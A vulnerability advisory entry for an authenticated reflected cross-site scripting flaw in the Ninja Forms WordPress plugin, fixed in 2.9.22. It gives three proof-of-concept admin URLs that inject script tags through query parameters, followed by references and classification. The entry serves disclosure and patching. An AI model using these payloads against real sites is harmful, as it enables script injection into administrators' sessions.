Ninja Forms <= 2.9.21 – Authenticated Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script>

http://www.example.com/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script>

http://www.example.com/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>&notification-action=new

Affects Plugins

Fixed in 2.9.22

References

URL

https://packetstormsecurity.com/files/#132913/

URL

https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_ninja_forms_xss_scanner.rb

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

Yes

WPVDB ID

c84fa906-4d70-4d4d-990e-a0510bcf72ed

Timeline

Publicly Published

2015-08-04 (about 10 years ago)

Added

2015-08-04 (about 10 years ago)

Last Updated

2019-10-22 (about 6 years ago)

Other

Published

Title

Published

2021-08-10

Title

Picture Gallery < 1.4.4 - Authenticated Stored XSS

Published

2025-01-10

Title

Fast Tube <= 2.3.1 - Reflected XSS

Published

2022-03-07

Title

Interactive Medical Drawing of Human Body < 2.6 - Admin+ Stored XSS

Published

2025-01-16

Title

imaGenius <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-03-02

Title

Slider, Gallery, Carousel by MetaSlider < 3.95.0 - Editor+ Stored XSS